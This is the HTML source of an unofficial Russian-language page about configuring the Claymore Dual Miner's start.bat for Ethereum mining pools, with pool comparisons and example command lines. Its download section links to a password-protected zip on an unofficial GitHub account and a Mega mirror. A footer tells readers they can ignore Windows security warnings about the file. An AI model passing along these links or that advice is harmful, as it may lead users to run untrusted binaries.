
<!DOCTYPE html>
<!--[if lt IE 7]><html class="lt-ie9 lt-ie8 lt-ie7" lang="ru" dir="ltr"><![endif]-->
<!--[if IE 7]><html class="lt-ie9 lt-ie8" lang="ru" dir="ltr"><![endif]-->
<!--[if IE 8]><html class="lt-ie9" lang="ru" dir="ltr"><![endif]-->
<!--[if gt IE 8]><!--><html lang="ru" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><!--<![endif]-->
<head>
<title>Настройки Claymore для Майнинга Эфира (ETH) (2019)</title>
<meta charset="utf-8" />
<link rel="canonical" href="https://claymoredualminer.com/nastrojki-claymore" /> 
<link rel="shortcut icon" href="items/favicon.ico" type="image/vnd.microsoft.icon" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes" />
<meta name="MobileOptimized" content="width" />
<meta name="HandheldFriendly" content="true" />
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="description" content="Claymore Dual Miner поддерживает майнинг монет на основе Ethash алгоритма (например, Ethereum) с 1% комисией." />

<link rel="stylesheet" href="/css/ETH.css">
<link rel="stylesheet" href="/css/global.base.css">
<link rel="stylesheet" href="/css/global.styles.css">
<link rel="stylesheet" href="/css/at.layout.css">


<link type="text/css" rel="stylesheet" href="https://use.fontawesome.com/releases/v5.2.0/css/all.css" media="all" />
<link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-137173386-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-137173386-2');
</script>
<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(53083204, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true,
        webvisor:true
   });
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/53083204" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!-- Yandex.Metrika domain -->
<script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(56512528, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true,
        webvisor:true
   });
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/56512528" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->


<meta name="yandex-verification" content="1facbca6aff9a0eb" />
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MKVRMS2');</script>
<!-- End Google Tag Manager -->




<!-- Global site tag (gtag.js) - Google Analytics domain -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-137173386-4"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-137173386-4');
</script>

</head>
<body>


<div id="page-wrapper">
  <div id="page" class="page at-mt eth-inner">


<div id="menu-bar" class="nav clearfix">
	<nav id="block-menu-menu-primary-menu" class="block block-menu menu-wrapper menu-bar-wrapper clearfix at-menu-toggle block-menu-primary-menu eth-menu" role="navigation">        

		<div class="menu-toggle">
			<ul class="menu clearfix">
			<li class="leaf"><a href="https://claymore-dual.github.io/ru" title="">Главная</a></li>
				<li class="first leaf"><a href="#start" title="">Быстрый старт</a></li>
				<li class="leaf"><a href="#download" title="">Скачать</a></li>

			</ul>
		</div>  
	</nav>
	</div>

<section class="eth-header">
	<div class="eth-header-flex">
		<div class="eth-header-center eth-vi">
			<div class="eth-header-composition">
			<h2>Claymore's Dual Ethereum AMD+NVIDIA GPU Miner</h2>
			<p class="eth-fast"><span class="green">Самый быстрый Ethereum</span>/Ethash майнер с <span class="green">самой низкой комиссией</span></p> 
			<div class="eth-button"><i class="far fa-arrow-alt-circle-down"></i><a href="https://github.com/Claymore-Dual/Claymore-Dual-Miner/releases/download/15.0/Claymore.s.dual.ethereum.miner.v15.0.-.widows.Password-claymore.zip">Скачать</a>
			</div>
			</div>
		</div>
	</div>
</section>
<section class="eth-art">
<H1 class="eth-title"><a id="start">Настройка claymore для эфира</a></h1>
	<div class="eth-vi2">
<p>Пример настроенного .bat файла для добычи Ethereum на пуле Ethermine</p>
<h3>Пример</h3>
<img src="items/examples/ethermine.png" alt="ethermine">	
<h2>Скачайте Claymore</h2>

<p>Первое, что вам нужно сделать, это скачать Claymore's. Для тех, кто имеет какой-либо технический опыт, это должно быть самой простой частью процесса. Загрузите последнюю версию. Вам нужно будет распаковать этот файл куда-нибудь на вашем компьютере. </p>

<p><strong> Примечание</strong>. Если у вас нет современной видеокарты с соответствующим объемом ОЗУ, вы можете перестать читать. Claymore работает только с картами более высокого класса, такими как RX 470, 480 или 580, с объемом оперативной памяти не менее 2 ГБ (и некоторыми другими), а также с картами топ-оф-лайн, изготовленными с использованием оборудования Nvidia.</p>

<h2>Найдите пул</h2>

<p>Прежде чем вы сможете правильно настроить Claymore, вам нужно определиться с пулом майнинга Ethereum, который вы собираетесь использовать. </p>

<p>Но подождите, спросите вы, а как насчет соло майнинга, где вы можете заработать <em>реальные деньги</em>? Если вы не вложили десятки тысяч долларов в свое оборудование, и вы, вероятно, не хотите заниматься моим. Технически вы <em>можете майнить в соло</em>, но это немного более сложный процесс, и вы рискуете эксплуатировать свою установку в течение нескольких недель или месяцев и, возможно, никогда не создать ни одного Эфира.</p>

<p>Скорее всего, если вы читаете этот сайт, вам нужен пул. Но к какому из них вы должны присоединиться?  Мы рекомендуем Ethermine или Nanopool. Оба они высоко ценятся в сообществе и имеют веб-сайты, которые в основном на английском языке.</p>
<p>Итак, необходимо выбрать пул. Рекомендуем пока что просто выбрать тот пул, где сосредоточены самые большие мощности это:</p>
 <table class="responsive-table mar">
	<caption></caption>
		<thead>
		<tr>
			<th scope="col">#</th>
			<th scope="col">адрес</th>
			<th scope="col">
			мощность,
			%
			</th>
			<th scope="col">
			комиссия,
			%
			</th>
			<th scope="col">прим.</th>
			<th scope="col">
			мин.
			выплата
			</th>
		</tr>
		</thead>
			<tbody>
		<tr>
			<td data-title="№">1</td>
			<td data-title="адрес"><a href="https://ethermine.org/">https://ethermine.org</a></td>
			<td data-title="мощность, %">28,60</td>
			<td data-title="комиссия, %">1</td>
			<td data-title="прим."><a href="/articles/pps-i-pplns-puly-rukovodstvo-po-strukture-voznagrazhdeniya-v-mayninge">PPLNS</a> выплаты (лучше)</td>
			<td data-title="мин. выплата">0.05</td>
		</tr>
		<tr>
			<td data-title="№">2</td>
			<td data-title="адрес"><a href="https://www.sparkpool.com/">https://www.sparkpool.com</a></td>
			<td data-title="мощность, %">17.9</td>
			<td data-title="комиссия, %">1</td>
			<td data-title="прим.">
			китайский
			интерфейс
			</td>
			<td data-title="мин. выплата">0.05</td>
		</tr>
		<tr>
			<td data-title="№">3</td>
			<td data-title="адрес"><a href="http://dwarfpool.com/eth">http://dwarfpool.com/eth</a></td>
			<td data-title="мощность, %">15.0</td>
			<td data-title="комиссия, %">1</td>
			<td data-title="прим.">можно настроить мин. выплату до 0.05</td>
			<td data-title="мин. выплата">1.01</td>
		</tr>
		<tr>
			<td data-title="№">4</td>
			<td data-title="адрес"><a href="https://eth.nanopool.org/">https://eth.nanopool.org</a></td>
			<td data-title="мощность, %">13.3</td>
			<td data-title="комиссия, %">1</td>
			<td data-title="прим.">иногда отстает статистика</td>
			<td data-title="мин. выплата">0.2</td>
		</tr>
		<tr>
			<td data-title="№">5</td>
			<td data-title="адрес"><a href="https://www.f2pool.com/">https://www.f2pool.com</a></td>
			<td data-title="мощность, %">9%</td>
			<td data-title="комиссия, %">2.5</td>
			<td data-title="прим.">
			нужна
			регистрация
			</td>
			<td data-title="мин. выплата">0.1</td>
		</tr>
		<tr>
			<td data-title="№">6</td>
			<td data-title="адрес"><a href="https://ethereum.miningpoolhub.com/">https://ethereum.miningpoolhub.com</a></td>
			<td data-title="мощность, %">8%</td>
			<td data-title="комиссия, %">0.9</td>
			<td data-title="прим.">
			нужна
			регистрация
			</td>
			<td data-title="мин. выплата">0,0105</td>
		</tr>
	</tbody>
</table>

<h2>Настройте свой конфигурационный файл</h2>

<p>Это та часть, где большинство новичков в Claymore теряются. Чтобы правильно запустить приложение и заставить его добывать Ethereum в ваш кошелек, вам нужно настроить / отформатировать файл start.bat (он находится в той папке, которую вы извлекли ранее) в соответствии с пулом, который вы выбрали выше. </p>

<p>Установки для этих пулов имеют тенденцию меняться очень незначительно (например, некоторые могут попросить вас включить вашу электронную почту в файл конфигурации, в то время как другие не будут), но есть некоторые основы, которые соответствуют всем им.</p>

<p>Вот краткий обзор того, как выглядит ненастроенный start.bat файл (чтобы убедиться в этом, загрузите Claymore, извлеките файлы, щелкните правой кнопкой мыши start.bat и нажмите «Изменить», чтобы открыть его в текстовом редакторе). Мы объясним, как настроить каждую его часть ниже.</p>

<p>Вот полная строка текста:</p>

<blockquote><pre><code><em>EthDcrMiner64.exe -epool eu1.ethermine.org:4444 -ewal 0x9147460980c93629e775783148591b7d0a0cbf2d -eworker asus -epsw x -mode 1 -dbg -1 -mport 0 -etha 0 -retrydelay 3  -ttli 90 -tstop 92 
pause</em></code></pre></blockquote>


<p><em>.bat </em>файл предназначен для запуска программы EthDcrMiner64.exe; вот почему это первая часть настройки. Остальная информация здесь соответствует различным параметрам. Они обозначены «-» и таким термином, как «-epool. Строка текста после этого параметра - это то, для чего вы устанавливаете параметр.</p>

<p>Например, файл start.bat по умолчанию настроен для запуска «-epool» (в данном случае это пул Ethereum, который вы хотите использовать) как «eu1.ethermine.org:4444». Как вы можете догадаться, это означает, что «-ewal» (кошелек Ethereum, на который вы хотите майнить) установлен на «0x9147460980c93629e775783148591b7d0a0cbf2d».</p>

<p>Очевидно, что для правильной работы Claymore необходимо настроить все эти параметры для вашего пула и кошелька. В противном случае, если вы просто запустите файл start.bat без изменения какого-либо из этих параметров, вы просто займетесь майнингом Claymore не на свой кошелек. </p>

<p>Поскольку существует множество различных пулов, конфигурация этого файла немного меняется. Но для большинства пулов вы будете заполнять адрес и порт (порт является частью: 3333 части URL) требуемого пула, добавляя свой адрес Ethereum, чтобы получать выплаты, и указывать имя работника. (обычно после адреса кошелька).</p>

<h2>Пример 1: ethermine</h2>

<p>Давайте использовать Ethermine.org в качестве первого примера (и если вы используете другой пул, вы можете проверить их сайты, чтобы увидеть, как их конфигурация может немного отличаться). </p>

<p>Удобно, что этот сайт предоставил идеальный шаблон для настройки вашего start.bat файла. Если вы хотите использовать Ethermine, просто удалите все в вашем файле start.bat, замените его следующей строкой и заполните информацию для вашей установки. (Или вы можете сделать копию start.bat, чтобы не потерять значение по умолчанию.)</p>

<blockquote><code>EthDcrMiner64.exe -epool eu1.ethermine.org:4444 -ewal &lt;Ваш_Ethereum_Address&gt;. &lt;название_фермы&gt; -epsw x</code></blockquote>

<p>Вот как его настроить для вашей установки.</p>

<p>Выберите сервер, который находится рядом с вами, чтобы уменьшить пинг (Ethermine предлагает us1, us2, eu1, eu2 и asia1; мы выбрали eu1 для этого примера, как вы можете видеть выше). Если вы хотите изменить это, просто замените ту часть URL-адреса в файле start.bat, который вы только что создали.</p>

<p>Замените &lt;Ваш_Ethereum_Address&gt; (адрес должен быть без скобочек как в примере выше) на ваш адрес Ethereum, начинающийся с 0x.</p>

<p>Замените &lt;название_фермы &gt; (без скобочек) на любой псевдоним, который вы хотите присвоить своей установке. Обязательно оставьте промежуток между адресом Ethereum и именем фермы.</p>

<p>Вот и все!</p>

<h2>Пример 2: Nanopool</h2>

<blockquote><pre><code>EthDcrMiner64.exe -epool eth-eu2.nanopool.org:9999 -ewal 0x1a0e2c4cd699cee12672adc223fdb30b93253eba -eworker rig1 -epsw x -mode 1 -r 1 -dbg -1 -mport 0 -etha 0 -retrydelay 3 -ftime 45 -tt 70 -ttli 79 -tstop 82 -fanmin 30
pause</code></pre></blockquote>
<h2>Пример с Dwarfpool</h2>
<blockquote><pre><code>EthDcrMiner64.exe -epool eth-ru2.dwarfpool.com:8008 -ewal 0x9147460980c93629e775783148591b7d0a0cbf2d.rig1 -mode 1 -r 1 -dbg -1 -mport 0 -etha 0 -retrydelay 3 -ftime 45 -tt 73 -ttli 79 -tstop 82 -fanmin 30
pause</code></pre></blockquote>
<h2>Пример с Miningpoolhub</h2>
<blockquote><pre><code>EthDcrMiner64.exe -epool europe.ethash-hub.miningpoolhub.com:20535 -ewal rgzrgz_leo.rgzrgz_leo -epsw x -mode 1 -dbg -1 -mport 0 -etha 0 -retrydelay 3 -ttli 90 -tstop 92 -esm 2
pause</code></pre></blockquote>
<h2>Пример с nanopool с указанием email</h2>
<blockquote><pre><code>EthDcrMiner64.exe -epool eth-eu2.nanopool.org:9999 -ewal 0x1a0e2c4cd699cee12672adc223fdb30b93253eba.rig1 -epsw x -mode 1 -r 1 -dbg -1 -mport 0 -etha 0 -retrydelay 3 -ftime 45 -tt 70 -ttli 79 -tstop 82 -fanmin 30
pause
</code></pre></blockquote>
<h2>Пример с Minerall</h2>
<blockquote><pre><code>EthDcrMiner64.exe -epool pool.minerall.io:3401 -ewal 0x9147460980c93629e775783148591b7d0a0cbf2d -eworker rig1 -epsw x -mode 1 -r 1 -dbg -1 -mport 0 -etha 0 -retrydelay 3 -ftime 55 -tt 70 -ttli 79 -tstop 82 -fanmin 30 -esm 3
pause
</code></pre></blockquote>
<h2>Пример с Sparkpool</h2>
<blockquote><pre><code>EthDcrMiner64.exe -epool eu.sparkpool.com:3333 -ewal 0x9147460980c93629e775783148591b7d0a0cbf2d -eworker rig1 -epsw x -mode 1 -r 1 -dbg -1 -mport 0 -etha 0 -retrydelay 3 -ftime 55 -tt 70 -ttli 79 -tstop 82 -fanmin 30
pause
</code></pre></blockquote>

<p><p class="vaz2">Проект Claymore представляет самые <strong>последние версии</strong> программного обеспечения (исправляет все ошибки и баги  предыдущих версий)! Поэтому если у Вас <strong>старая</strong> версия, мы настоятельно советуем <strong>скачать</strong> последнюю версию Claymore's по ссылкам ниже, так как с каждым выходом новой версии добыча Эфира становится <strong>выгоднее</strong>!</p>
</div>
</section>

<section class="eth-down">
<div class="eth-title whitez1"><a id="download">Начните добывать Ethereum с Claymore's Dual  Miner </a></div>
<div class="eth-download">
	<div class="eth-flex">	
		<div class="eth-ver">	
		Последняя версия - v15.0
		MD5: 1F5C4B840F7563E592308E09EB0F1471 *Claymore's Dual Ethereum  AMD+NVIDIA GPU Miner v15.0 - Windows.zip
		<span class="nev2">(<a href="https://github.com/Claymore-Dual/Claymore-Dual-Miner/releases/download/15.0/Claymore.s.Dual.Ethereum.AMD+NVIDIA.GPU.Miner.v15.0.-.LINUX.zip">Скачать для Linux</a>)</span>	
		</div>
		<div class="eth-get">
		<span class="eth-password">Пароль: claymore</span>
		<div class="eth-button down"><i class="far fa-arrow-alt-circle-down"></i>
		<a href="https://github.com/Claymore-Dual/Claymore-Dual-Miner/releases/download/15.0/Claymore.s.dual.ethereum.miner.v15.0.-.widows.Password-claymore.zip">Скачать сейчас (Windows x64)</a>
		</div>
		<span class="eth-mirror">(<a href="https://mega.nz/#!qSYT0QKa!vngaKYWKsc0MkvcsqeIaYqJaUX1-mFQ7Ejqz6udb43E" target="_blank" rel="nofollow">зеркало</a>)</span>
		</div>	
	</div>
</div>
</section>
<section>
</section>




<!-- footer-->
<section class="eth-foot">
	<div class="">
		<div class="eth-flex">
			<div class="foot-itm community">
				<p>Сообщество</p>
				<ul>
					<li><a href="https://blog.ethereum.org" target="_blank" rel="nofollow"><i class="fas fa-rss"></i> Блог</a>
					</li>
					<li><a href="https://github.com/Claymore-Dual/Claymore-Dual-Miner/releases" target="_blank" rel="nofollow"><i class="fab fa-github"></i> GitHub</a>
					</li>
					<li><a href="https://www.youtube.com/user/ethereumproject" target="_blank" rel="nofollow"><i class="fab fa-youtube"></i> YouTube</a>
					</li>
					<li><a href="https://www.reddit.com/r/ethereum" target="_blank" rel="nofollow"><i class="fab fa-reddit"></i> Reddit</a>
					</li>
					<li><a href="https://gitter.im/orgs/ethereum/rooms" target="_blank" rel="nofollow"><i class="fab fa-gitter"></i> Gitter</a>
					</li>
				</ul>
			</div>
					
		<div class="foot-itm community">
			<ul>
				<li><a href="https://twitter.com/ethereum" target="_blank" rel="nofollow"><i class="fab fa-twitter"></i> Twitter</a>
				</li>
				<li><a href="https://ethereum.stackexchange.com" target="_blank" rel="nofollow"><i class="fab fa-stack-exchange"></i> Stack Exchange</a>
				</li>
				<li><a href="https://www.facebook.com/ethereumproject" target="_blank" rel="nofollow"><i class="fab fa-facebook"></i> Facebook                </a>
				</li>
				<li><a href="https://ethereum.meetup.com" target="_blank" rel="nofollow"><i class="fab fa-meetup"></i> Встречи</a>
				</li>
			</ul>
		</div>
		
			<div class="foot-itm developer-resources">
			<p>Ресурсы для разработчиков</p>
			<ul>
				<li>What is Ether? <a href="#FAQ">Read our FAQ</a></li>
				<li>Browse our source code on <a href="https://github.com/Claymore-Dual/Claymore-Dual-Miner/releases" target="_blank" rel="nofollow">GitHub</a></li>
				<li>Read the <a href="http://www.ethdocs.org/" target="_blank" rel="nofollow">documentation</a>
		or <a href="https://github.com/ethereum/wiki/wiki" target="_blank" rel="nofollow">wiki</a></li>
		<li>Learn <a href="https://solidity.readthedocs.org/" target="_blank" rel="nofollow">Solidity</a></li>
		<li>See the latest <a href="https://ethstats.net" target="_blank" rel="nofollow">data and network stats</a>
		</li>
		<li>Download our <a href="https://www.ethereum.org/assets" rel="nofollow">logo assets </a></li>
		<li>Want to write about Ethereum? <a href="mailto:press@ethereum.org">Press inquiries</a>
		</li>
		<li>switch to the <a href="/ru">English language.</a>
		</li>
			</ul>
			</div>
		</div>
	</div>
</section>
<section class="eth-post-foot clearfix">
	<div class="eth-vi2">
		<div class="nev3 eth-left">Note, when downloading the Claymore Miner, Windows may issue a warning, but if you used Claymore Dual Miner download link you can ignore this.
		</div>

		<div class="nev3 eth-right">Disclaimer: This isn't an official Claymores site.  No binary files were affected.

		All rights belong to their respective owners. © 2018-2019
		</div>
	</div>
	<a href="https://claymore-dual.github.io/cookie" class="eth-policy" target="_blank" rel="nofollow">Cookie Policy</a>
</section>
  </div>
</div>  </body>
</html>